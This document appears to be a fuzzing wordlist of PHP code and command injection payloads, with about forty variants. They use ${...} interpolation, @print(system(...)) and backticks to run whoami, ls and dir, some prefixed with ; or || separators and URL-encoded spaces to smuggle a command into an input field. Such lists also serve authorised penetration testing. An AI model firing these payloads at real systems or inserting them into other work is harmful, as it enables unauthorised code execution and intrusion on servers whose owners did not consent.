${`whoami`}
${(@print(system("whoami"))}
${(@print(system("ls%20-la"))}
${(@print(system(`whoami`))}
||${(@print(system("whoami"))}
;${(@print(system("whoami"))}
;%20${(@print(system("whoami"))}
;${(@print(system(`whoami`))}
||${(@print(system(`whoami`))}
;%20${(@print(system(`whoami`))}
;${`whoami`}
||%20${`whoami`}
@print(`whoami`)
@print("whoami")
${@print("whoami")}
${@print(`whoami`)}
${(@print(system(`ls`))}
||${(@print(system("ls"))}
;${(@print(system("ls"))}
;%20${(@print(system("ls"))}
;${(@print(system(`ls`))}
||${(@print(system(`ls`))}
;%20${(@print(system(`ls`))}
;${`ls`}
||%20${`ls`}
@print(`ls`)
@print("ls")
${@print("ls")}
${@print(`ls`)}
${(@print(system(`dir`))}
||${(@print(system("dir"))}
;${(@print(system("dir"))}
;%20${(@print(system("dir"))}
;${(@print(system(`dir`))}
||${(@print(system(`dir`))}
;%20${(@print(system(`dir`))}
;${`dir`}
||%20${`dir`}
@print(`dir`)
@print("dir")
${@print("dir")}
${@print(`dir`)}

